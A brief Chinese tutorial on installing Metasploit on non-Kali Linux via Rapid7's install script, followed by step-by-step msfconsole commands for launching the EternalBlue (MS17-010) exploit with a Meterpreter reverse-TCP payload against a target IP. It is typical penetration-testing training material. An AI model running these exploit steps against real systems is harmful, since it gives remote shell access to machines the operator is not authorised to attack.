以下是非kali的Linux下安装MSF框架
一键安装
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall adduser msf #添加msf用户 su msf #切换到msf用户 cd /opt/metasploit-framework/bin #切换到msf所在的目录 ./msfconsole #以后启动msfconsole,都切换到msf用户下启动,这样会同步数据库。如果使用root用户启动的话,不会同步数据库 也可以将msfconsole加入到执行目录下,这样在任何目录直接msfconsole就可以了 ln -s /opt/metasploit-framework/bin/msfconsole /usr/bin/msfconsole #备注: #初次运行msf会创建数据库,但是msf默认使用的PostgreSQL数据库不能与root用户关联,这也这也就是需要新建用户msf来运行metasploit的原因所在。如果你一不小心手一抖,初次运行是在root用户下,请使用 msfdb reinit 命令,然后使用非root用户初始化数据库。 MSF后期的升级:msfupdate
使用方法(永恒之蓝为例):
-
进入框架:msfconsole
-
使用search命令查找相关漏洞: search ms17-010
-
使用use进入模块: use exploit/windows/smb/ms17_010_eternalblue
-
使用info查看模块信息: info
-
设置攻击载荷:set payload windows/x64/meterpreter/reverse_tcp
-
查看模块需要配置的参数:show options
-
设置参数:set RHOST 192.168.2.123(目标IP)
-
攻击:exploit / run
-
后渗透阶段